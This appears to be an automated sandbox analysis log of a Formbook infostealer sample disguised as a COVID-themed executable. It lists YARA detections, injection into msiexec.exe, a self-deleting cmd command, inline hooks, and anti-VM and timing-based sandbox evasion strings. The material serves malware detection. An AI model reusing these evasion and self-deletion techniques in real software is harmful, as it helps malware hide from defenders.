          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0152B090
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015420A0
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015E20A8
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015E2B28
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015D03DA
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015DDBD2
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0154EBB0
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015E22AE
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015E1D55
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015E2D07
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01510D20
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015E25DD
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0152D5E0
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01542581
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015DD466
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0152841F
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015EDFCE
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015E1FF1
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015DD616
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01536E30
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015E2EF7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0464D466
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0459841F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04651D55
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04652D07
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04580D20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_046525DD
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0459D5E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045B2581
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045A6E30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0464D616
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04652EF7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04651FF1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04641002
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_046528EC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0459B090
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_046520A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045B20A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0458F900
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045A4120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_046522AE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04652B28
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0464DBD2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045BEBB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0069D183
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0069D186
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0069E4CE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00682D87
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00682D90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00689E40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00682FB0
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: String function: 0151B150 appears 45 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0458B150 appears 35 times
          Source: Po-covid19 2372#w2..exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Po-covid19 2372#w2..exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Po-covid19 2372#w2..exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Po-covid19 2372#w2..exeBinary or memory string: OriginalFilename vs Po-covid19 2372#w2..exe
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.250216585.0000000000B10000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAssemblyReferenceEntry.exeD vs Po-covid19 2372#w2..exe
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.248339854.000000000017A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamefC.exeB vs Po-covid19 2372#w2..exe
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.263476801.0000000009000000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs Po-covid19 2372#w2..exe
          Source: Po-covid19 2372#w2..exe, 00000002.00000000.244485591.000000000023A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamefC.exeB vs Po-covid19 2372#w2..exe
          Source: Po-covid19 2372#w2..exe, 00000003.00000000.246312953.0000000000ABA000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamefC.exeB vs Po-covid19 2372#w2..exe
          Source: Po-covid19 2372#w2..exe, 00000003.00000002.299564260.000000000179F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Po-covid19 2372#w2..exe
          Source: Po-covid19 2372#w2..exe, 00000003.00000002.298645878.000000000141F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemsiexec.exeX vs Po-covid19 2372#w2..exe
          Source: Po-covid19 2372#w2..exeBinary or memory string: OriginalFilenamefC.exeB vs Po-covid19 2372#w2..exe
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
          Source: Po-covid19 2372#w2..exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.297322370.0000000000FB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.297322370.0000000000FB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.616862762.0000000000B70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.616862762.0000000000B70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.298199420.00000000013B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.298199420.00000000013B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.256080598.000000000406F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.256080598.000000000406F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.Po-covid19 2372#w2..exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.Po-covid19 2372#w2..exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.Po-covid19 2372#w2..exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.Po-covid19 2372#w2..exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Po-covid19 2372#w2..exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/1@6/4
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Po-covid19 2372#w2..exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7100:120:WilError_01
          Source: Po-covid19 2372#w2..exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Po-covid19 2372#w2..exeReversingLabs: Detection: 27%
          Source: unknownProcess created: C:\Users\user\Desktop\Po-covid19 2372#w2..exe 'C:\Users\user\Desktop\Po-covid19 2372#w2..exe'
          Source: unknownProcess created: C:\Users\user\Desktop\Po-covid19 2372#w2..exe {path}
          Source: unknownProcess created: C:\Users\user\Desktop\Po-covid19 2372#w2..exe {path}
          Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Po-covid19 2372#w2..exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess created: C:\Users\user\Desktop\Po-covid19 2372#w2..exe {path}
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess created: C:\Users\user\Desktop\Po-covid19 2372#w2..exe {path}
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Po-covid19 2372#w2..exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Po-covid19 2372#w2..exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Po-covid19 2372#w2..exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: Po-covid19 2372#w2..exeStatic file information: File size 1304576 > 1048576
          Source: Po-covid19 2372#w2..exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x106200
          Source: Po-covid19 2372#w2..exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msiexec.pdb source: Po-covid19 2372#w2..exe, 00000003.00000002.298579388.0000000001410000.00000040.00000001.sdmp
          Source: Binary string: msiexec.pdbGCTL source: Po-covid19 2372#w2..exe, 00000003.00000002.298579388.0000000001410000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Po-covid19 2372#w2..exe, 00000003.00000002.299260110.000000000160F000.00000040.00000001.sdmp, msiexec.exe, 0000000E.00000002.618326850.0000000004560000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Po-covid19 2372#w2..exe, msiexec.exe

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeUnpacked PE file: 0.2.Po-covid19 2372#w2..exe.70000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
          Detected unpacking (overwrites its own PE header)Show sources
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeUnpacked PE file: 0.2.Po-covid19 2372#w2..exe.70000.0.unpack
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00076008 push ss; iretd
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_000723E2 push eax; ret
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC2488 push ss; iretd
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_09743122 pushad ; iretd
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 2_2_00136008 push ss; iretd
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 2_2_001323E2 push eax; ret
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0041D0E2 push eax; ret
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0041D0EB push eax; ret
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0041D095 push eax; ret
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0041D14C push eax; ret
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0041D95B push ebp; iretd
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_004163D5 push ebx; ret
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_009B6008 push ss; iretd
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_009B23E2 push eax; ret
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0156D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045DD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0069D0EB push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0069D0E2 push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0069D095 push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0069D14C push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0069D95B push ebp; iretd
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_006963D5 push ebx; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.44459929766

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xEA
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM_3Show sources
          Source: Yara matchFile source: 00000000.00000002.253062095.0000000002708000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Po-covid19 2372#w2..exe PID: 5532, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.254634117.00000000027FE000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.254634117.00000000027FE000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msiexec.exeRDTSC instruction interceptor: First address: 00000000006898E4 second address: 00000000006898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msiexec.exeRDTSC instruction interceptor: First address: 0000000000689B5E second address: 0000000000689B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe TID: 4012Thread sleep time: -31500s >= -30000s
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe TID: 6008Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6472Thread sleep count: 54 > 30
          Source: C:\Windows\explorer.exe TID: 6472Thread sleep time: -108000s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3576Thread sleep count: 33 > 30
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3576Thread sleep time: -66000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.254634117.00000000027FE000.00000004.00000001.sdmpBinary or memory string: VMware
          Source: explorer.exe, 00000004.00000000.276172975.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000000.274761665.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.254634117.00000000027FE000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: explorer.exe, 00000004.00000000.276172975.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000004.00000002.635752536.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.254634117.00000000027FE000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000004.00000000.274761665.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.254634117.00000000027FE000.00000004.00000001.sdmpBinary or memory string: VMware
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.254634117.00000000027FE000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.254634117.00000000027FE000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.254634117.00000000027FE000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000004.00000000.276645530.00000000088C3000.00000004.00000001.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATAA
          Source: explorer.exe, 00000004.00000002.617345599.0000000001438000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWal<%SystemRoot%\system32\mswsock.dllkagesB
          Source: explorer.exe, 00000004.00000000.276172975.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000004.00000000.275860033.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
